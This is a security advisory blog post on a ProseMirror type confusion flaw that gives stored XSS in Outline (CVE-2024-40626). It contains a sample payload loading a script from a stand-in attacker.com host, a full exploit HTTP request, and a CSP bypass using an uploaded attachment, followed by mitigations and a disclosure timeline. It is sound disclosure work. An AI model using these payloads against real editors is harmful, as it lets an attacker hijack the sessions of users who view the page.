Type confusion attacks in ProseMirror editors

Jul 16, 2024

Summary

Calif was recently engaged to audit Outline, an open source knowledge base management package. Aside from the server-side components, we focused on Outline’s rather complicated editor, which is based on the ProseMirror library.

We found a type confusion issue in ProseMirror’s rendering process that leads to a stored Cross-Site Scripting (XSS) vulnerability in Outline (CVE-2024-40626). An authenticated user can create a document containing a malicious JavaScript payload. When other users view this document, the malicious JavaScript can execute in the origin of Outline.

While we demonstrated this specific vulnerability in Outline, other ProseMirror editors might be vulnerable to similar type confusion attacks. We recommend that Outline users upgrade to the latest version of Outline, and that developers of other ProseMirror editors upgrade to the latest version of ProseMirror.

We specially thank the Outline and ProseMirror teams for quickly addressing the specific XSS vulnerability and the general type confusion attack vector.

Table of contents

Summary

ProseMirror type confusion attacks

Outline case study

Recommendations

Timeline

ProseMirror type confusion attacks

ProseMirror content model

ProseMirror represents content as a JSON node tree, as follows:

{
 "type": "doc",
 "content": [
   {
     "type": "paragraph",
     "attrs": {
       "id": "testid"
     },
     "marks": [
       {
         "type": "strong"
       }
     ],
     "content": [
       {
         "type": "text",
         "text": "test"
       }
     ]
   }
 ]
}

Each node in the tree consists of a type, various attributes, various marks, and child nodes. The root node is a doc type node. The child nodes of each node are defined in the content array.
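To make the shape of this tree concrete, here is a minimal sketch in TypeScript. The `JSONNode` interface and the `collectTypes` helper are our own illustrative names, not ProseMirror typings or APIs. Attribute values are typed as `unknown` on purpose: nothing in the JSON format itself restricts what an attribute may hold.

```typescript
// Hypothetical type describing the JSON node shape shown above.
// This is an illustration, not ProseMirror's own type definition.
interface JSONNode {
  type: string;
  attrs?: Record<string, unknown>; // attribute values can be any JSON value
  marks?: { type: string; attrs?: Record<string, unknown> }[];
  content?: JSONNode[];
  text?: string;
}

// Walk the tree depth-first and collect each node's type, parents first.
function collectTypes(node: JSONNode, out: string[] = []): string[] {
  out.push(node.type);
  for (const child of node.content || []) {
    collectTypes(child, out);
  }
  return out;
}

const doc: JSONNode = {
  type: "doc",
  content: [
    {
      type: "paragraph",
      attrs: { id: "testid" },
      marks: [{ type: "strong" }],
      content: [{ type: "text", text: "test" }],
    },
  ],
};

console.log(collectTypes(doc).join(" > ")); // doc > paragraph > text
```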

Editors must define a schema that contains node specs and mark specs, as shown below:

import {Schema} from "prosemirror-model"
export const schema = new Schema({nodes: node_specs, marks: mark_specs})

A simple built-in schema of ProseMirror can be found here.

Node specs and mark specs are almost identical. To save space, we cover only node specs from here on.

Node specs contain the following information:

The node type: The node's name, a string.
The attrs property: The allowlist of node attributes and their defaults.
The parseDOM property: Rules for parsing an HTML DOM element into a JSON node.
The toDOM method: Converts a JSON node to a description of an HTML DOM element.

Here is an example node spec of heading elements:

const node_specs = {

 doc: {
     content: "block+"
 } as NodeSpec,

 heading: {
     attrs: {level: {default: 1}},
     content: "inline*",
     group: "block",
     defining: true,
     parseDOM: [
         {tag: "h1", attrs: {level: 1}},
         {tag: "h2", attrs: {level: 2}},
         {tag: "h3", attrs: {level: 3}},
         {tag: "h4", attrs: {level: 4}},
         {tag: "h5", attrs: {level: 5}},
         {tag: "h6", attrs: {level: 6}}
     ],
     toDOM(node) { 
         return ["h" + node.attrs.level, 0]
     }
 } as NodeSpec

}

ProseMirror rendering

To render content, ProseMirror serializes the content's JSON node tree to an HTML DOM tree. The detailed process is described in the library guide and the API reference. This task is handled by DOMSerializer, which holds the following two maps:

nodes: Map node names to the toDOM methods that take a node and return a description of the corresponding HTML DOM element.
marks: Map mark names to the toDOM methods that take a mark and return a description of the corresponding HTML DOM element.

To create the HTML DOM tree, ProseMirror calls DOMSerializer.serializeFragment, passing in the JSON node tree. This method walks the JSON node tree recursively. For each node, ProseMirror calls DOMSerializer.serializeNodeInner, which performs the following steps:

1. Call the toDOM function of the node to get a DOMOutputSpec object.
2. Call DOMSerializer.renderSpec to convert the DOMOutputSpec object into an HTML DOM element, using the browser’s DOM API, such as createElement, createTextNode, or setAttribute.

The format of the DOMOutputSpec object in step 1 is flexible. It could be one of the following types:

A DOMNode object: DOMSerializer.renderSpec will render the object as-is.
A text string: DOMSerializer.renderSpec will render an HTML DOM text node.
An array specifying a DOM element: DOMSerializer.renderSpec will render an HTML DOM element according to this spec. The array contains the following items:
- The first item: The string HTML tag name.
- The second item: The HTML attribute object.
- The remaining items: Zero or more child DOMOutputSpec objects.

Below are examples of DOMOutputSpec specified as an array:

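No child: The number 0 is a "hole" that marks where ProseMirror inserts the node's own content. For a node without content, this object renders to <div class="test"></div>.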
```
[
    "div",
    { class: "test" },
    0
]
```
A text child: This object renders to <div class="test">text</div>.
```
[
    "div",
    { class: "test" },
    "text"
]
```
A node child: This object renders to <div class="test"><img src="/image/path"></div>.
```
[
    "div",
    { class: "test" },
    [
        "img",
        { src: "/image/path" },
        0
    ]
]
```
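The array handling described above can be sketched as a small recursive function. This is a simplified stand-in that we wrote for illustration, not ProseMirror's `renderSpec`: the name `renderToHtml` is hypothetical, it produces an HTML string instead of DOM nodes, it does not accept DOM node objects, it simply skips the `0` hole, and it does not special-case void elements such as `img`.

```typescript
// Escape text so it is safe inside element content and attribute values.
function escapeHtml(s: string): string {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// A plain object (not an array, not null) in second position is the attribute object.
function isAttrs(v: unknown): v is Record<string, unknown> {
  return typeof v === "object" && v !== null && !Array.isArray(v);
}

// Hypothetical, simplified analogue of the array/string cases described above.
function renderToHtml(spec: unknown): string {
  if (typeof spec === "string") return escapeHtml(spec); // string => text node
  if (!Array.isArray(spec) || typeof spec[0] !== "string") {
    throw new Error("unsupported spec");
  }
  const tag: string = spec[0]; // first item: tag name
  let rest: unknown[] = spec.slice(1);
  let attrText = "";
  const first = rest[0];
  if (isAttrs(first)) { // second item: optional attribute object
    for (const key of Object.keys(first)) {
      const value = first[key];
      if (value != null) attrText += ` ${key}="${escapeHtml(String(value))}"`;
    }
    rest = rest.slice(1);
  }
  // Remaining items: child specs. The hole (0) is skipped in this sketch.
  const children = rest.filter((c) => c !== 0).map((c) => renderToHtml(c)).join("");
  return `<${tag}${attrText}>${children}</${tag}>`;
}

console.log(renderToHtml(["div", { class: "test" }, 0]));
// <div class="test"></div>
console.log(renderToHtml(["div", { class: "test" }, "text"]));
// <div class="test">text</div>
console.log(renderToHtml(["div", { class: "test" }, ["span", "hi"]]));
// <div class="test"><span>hi</span></div>
```

Note that the function decides between "text" and "element" purely from the runtime type of each item. That is the property the next section relies on.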

Type confusion attacks

The rendering process has two important security considerations:

toDOM takes as input a potentially untrustworthy JSON object, and returns as output a DOMOutputSpec object.
The DOMOutputSpec object can be a text string or an array.

Since a JSON object can contain text strings or arrays, toDOM might just copy the input JSON to its output DOMOutputSpec. This coding pattern might lead to type confusion attacks: toDOM might think it copies text strings, but it actually copies arrays. When DOMSerializer.renderSpec processes the output, instead of creating a text node, it will create an HTML DOM element. When the arrays specify, for example, script DOM elements, this leads to XSS.

Here is an example node spec with a vulnerable toDOM function:

{
  attrs: {
    id: {
      default: null,
    },
    src: {
      default: null,
    },
    title: {},
  },
  toDOM: (node) => [
    "div",
    {
      class: "video",
    },
    [
      "video",
      {
        id: node.attrs.id,
        src: sanitizeUrl(node.attrs.src),
      },
      node.attrs.title,
    ],
  ],
}

In this toDOM method, node.attrs.title is copied verbatim from the JSON input. The developer wants to copy a text string because they intend to output the following HTML:

<div class="video">
  <video id="[id]" src="[src]">
    [title]
  </video>
</div>

However, if we control the JSON content, we can pass node.attrs.title as an array specifying a script element, as follows:

{
  type: "<node name>",
  attrs: {
    id: "blah",
    src: "https://example.com",
    title: [
      "script",
      {
        "src": "https://attacker.com/evil.js"
      },
    ],
  },
}

This will force DOMSerializer.renderSpec to render a script element loading a JavaScript file under our control.
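The effect can be reproduced without a browser using a toy renderer. The sketch below is our own simplification: `renderToHtml` is a hypothetical string-producing stand-in for `DOMSerializer.renderSpec`, and `videoToDOM` mirrors the vulnerable `toDOM` above with the `sanitizeUrl` call left out for brevity.

```typescript
function escapeHtml(s: string): string {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

function isAttrs(v: unknown): v is Record<string, unknown> {
  return typeof v === "object" && v !== null && !Array.isArray(v);
}

// Hypothetical stand-in for renderSpec: strings become text, arrays become elements.
function renderToHtml(spec: unknown): string {
  if (typeof spec === "string") return escapeHtml(spec);
  if (!Array.isArray(spec) || typeof spec[0] !== "string") throw new Error("unsupported spec");
  const tag: string = spec[0];
  let rest: unknown[] = spec.slice(1);
  let attrText = "";
  const first = rest[0];
  if (isAttrs(first)) {
    for (const key of Object.keys(first)) {
      const value = first[key];
      if (value != null) attrText += ` ${key}="${escapeHtml(String(value))}"`;
    }
    rest = rest.slice(1);
  }
  const children = rest.filter((c) => c !== 0).map((c) => renderToHtml(c)).join("");
  return `<${tag}${attrText}>${children}</${tag}>`;
}

// Mirrors the vulnerable toDOM: title is copied into the spec without a type check.
function videoToDOM(attrs: Record<string, unknown>): unknown {
  return [
    "div",
    { class: "video" },
    ["video", { id: attrs["id"], src: attrs["src"] }, attrs["title"]],
  ];
}

// Intended use: title is a string, so it is rendered as escaped text.
const benignAttrs = { id: "blah", src: "https://example.com", title: "<b>My clip</b>" };
console.log(renderToHtml(videoToDOM(benignAttrs)));
// <div class="video"><video id="blah" src="https://example.com">&lt;b&gt;My clip&lt;/b&gt;</video></div>

// Attack: title is an array, so the renderer treats it as an element spec.
const hostileAttrs = {
  id: "blah",
  src: "https://example.com",
  title: ["script", { src: "https://attacker.com/evil.js" }],
};
console.log(renderToHtml(videoToDOM(hostileAttrs)));
// <div class="video"><video id="blah" src="https://example.com"><script src="https://attacker.com/evil.js"></script></video></div>
```

The string payload is escaped and harmless, while the array payload becomes a real element. No escaping step can help here, because the renderer never sees the array as text in the first place.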

Outline case study

ProseMirror in Outline

Outline uses ProseMirror to implement a generic React editor. The editor is customized to support various use cases:

All node specs and mark specs are defined at the following locations:

Stored XSS in the mention node spec

We discovered that the mention node spec was vulnerable to a type confusion attack via the node.attrs.label property. The simplified node spec with the vulnerable toDOM code is shown below:

{
  attrs: {
    label: {},
    id: {},
  },
  toDOM: (node) => [
    "span",
    {
      class: `${node.type.name} use-hover-preview`,
      id: node.attrs.id,
    },
    node.attrs.label,
  ],
}

To exploit this vulnerability, we create a new comment for a document, then update it with the following HTTP request:

POST /api/comments.update HTTP/1.1
Host: docs.calif-pentest.com
Cookie: sessions=%7B%7D; lastSignedIn=saml; accessToken=[accessToken]
Content-Length: 463
Cache-Control: no-cache
Pragma: no-cache
X-Api-Version: 3
Sec-Ch-Ua-Mobile: ?0
X-Editor-Version: 13.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://docs.calif-pentest.com
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: keep-alive

{
  "data": {
    "type": "doc",
    "content": [
      {
        "type": "paragraph",
        "content": [
          {
            "type": "mention",
            "attrs": {
              "type": "user",
              "modelId": "98e9c4e7-d4a7-48c9-98f4-f6c89183398f",
              "actorId": "98e9c4e7-d4a7-48c9-98f4-f6c89183398f",
              "id": "dcca1178-0858-48ca-a6e0-ce1dd47f2d61",
              "label": [
                "script",
                {
                  "src": "https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b"
                },
                "testxss"
              ]
            }
          },
          {
            "type": "text",
            "text": " a"
          }
        ]
      }
    ]
  },
  "id": "28d55628-5e58-4635-9b9c-e8aaeede4df3"
}

Instead of passing a string value for the label property, we passed an array:

[
 "script",
 {
   "src": "https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b"
 },
 "testxss"
]

Due to strict CSP rules, Outline does not load external JavaScript files. We can bypass this by attaching a JavaScript file to a document and referencing it via an attachment link like this:

https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b

Recommendations

We showed how to exploit a type confusion issue to mount a stored XSS attack in Outline. Given the complexity of ProseMirror editors, we believe other attacks might exist. To defend against our specific attack and against XSS in general, we recommend the following mitigations.

Mitigate type confusion attacks

We recommend updating the toDOM functions to verify all node attributes. Most node attributes are strings, and should be verified as such.
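As one possible shape for such a check, the sketch below rewrites the simplified mention `toDOM` so that every attribute passes through a string guard before it reaches the output spec. The `asText` helper and the `mentionToDOM` signature are hypothetical names of ours, and this is not necessarily how Outline fixed the issue.

```typescript
// Hypothetical helper: keep the value only if it really is a string.
function asText(value: unknown, fallback: string = ""): string {
  return typeof value === "string" ? value : fallback;
}

// Simplified mention toDOM with every attribute verified as a string.
// attrs stands in for node.attrs and typeName for node.type.name.
function mentionToDOM(attrs: Record<string, unknown>, typeName: string): unknown[] {
  return [
    "span",
    {
      class: `${typeName} use-hover-preview`,
      id: asText(attrs["id"]),
    },
    asText(attrs["label"]), // an array or object label collapses to ""
  ];
}

const friendly = mentionToDOM({ id: "u1", label: "Alice" }, "mention");
console.log(JSON.stringify(friendly[2])); // "Alice"

const hostile = mentionToDOM({ id: "u1", label: ["script", { src: "x" }] }, "mention");
console.log(JSON.stringify(hostile[2])); // ""
```

Dropping a non-string value is one design choice. Rejecting the whole document when the check fails is stricter and may be preferable on the server side.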

Sandbox the editor

We recommend re-designing the editor to render content in sandboxed iframes. An editor usually supports a lot of content types, such as math, external embeds, code highlighting, Mermaid diagrams, etc. These content types pull in many external libraries, which significantly increases the attack surface. Sandboxing the editor should help reduce the impact of any vulnerabilities.
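As a rough illustration of the idea, the sketch below builds the markup for a sandboxed frame. The `sandboxedFrame` helper is a hypothetical name of ours, and a real editor would need a messaging layer between the frame and the host page that we do not show. The key detail is that the `sandbox` attribute lists `allow-scripts` but not `allow-same-origin`, so the framed content runs in an opaque origin and cannot reach the host application's cookies or DOM.

```typescript
// Escape a string for use inside a double-quoted HTML attribute value.
function escapeAttr(s: string): string {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical helper: wrap rendered content in a sandboxed iframe.
// Scripts may run inside the frame, but without allow-same-origin
// the content is treated as coming from a unique, opaque origin.
function sandboxedFrame(renderedHtml: string): string {
  return `<iframe sandbox="allow-scripts" srcdoc="${escapeAttr(renderedHtml)}"></iframe>`;
}

console.log(sandboxedFrame('<p class="a">hi</p>'));
// <iframe sandbox="allow-scripts" srcdoc="&lt;p class=&quot;a&quot;&gt;hi&lt;/p&gt;"></iframe>
```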

Allow developers to declare stricter schema rules

This recommendation is for ProseMirror maintainers. ProseMirror lacks strict schema declarations for node attributes, especially for the attribute type. Editor developers might forget to validate node attributes themselves. We recommend that the ProseMirror team:

Provide a convenient way to declare allowed types of node attributes.
Enforce a default string type for undeclared node attributes.
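To illustrate what these two rules could look like in practice, here is a minimal sketch of a checker. Everything in it is hypothetical (the `AttrType` union, the `checkAttrs` function, and the decision to let `null` through because several specs above use `default: null`); it is not a ProseMirror API.

```typescript
// Primitive types a schema author could declare for an attribute (assumed set).
type AttrType = "string" | "number" | "boolean";

// Hypothetical checker: compare each attribute against its declared type,
// treating any undeclared attribute as "string". null is allowed (assumption).
function checkAttrs(
  declared: Record<string, AttrType>,
  attrs: Record<string, unknown>
): string[] {
  const problems: string[] = [];
  for (const key of Object.keys(attrs)) {
    const own = Object.prototype.hasOwnProperty.call(declared, key);
    const expected: AttrType = (own ? declared[key] : undefined) || "string";
    const value = attrs[key];
    if (value === null) continue;
    if (typeof value !== expected) {
      const actual = Array.isArray(value) ? "array" : typeof value;
      problems.push(`${key}: expected ${expected}, got ${actual}`);
    }
  }
  return problems;
}

// A heading declares level as a number; the undeclared id defaults to string.
console.log(checkAttrs({ level: "number" }, { level: 2, id: "intro" }).length); // 0

// The array label from the attack is rejected by the default string rule.
console.log(checkAttrs({}, { label: ["script", { src: "x" }] }).join("; "));
// label: expected string, got array
```

Running such a check when a document is deserialized from JSON, before any toDOM function sees it, would stop the payloads shown earlier regardless of how individual toDOM functions are written.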

Timeline

July 12 2024: We reported the issue to Outline.
July 14 2024: Outline fixed the issue and contacted ProseMirror maintainers. ProseMirror released a new version and published a security guide.
July 16 2024: Outline released a new version and published an advisory.

Calif
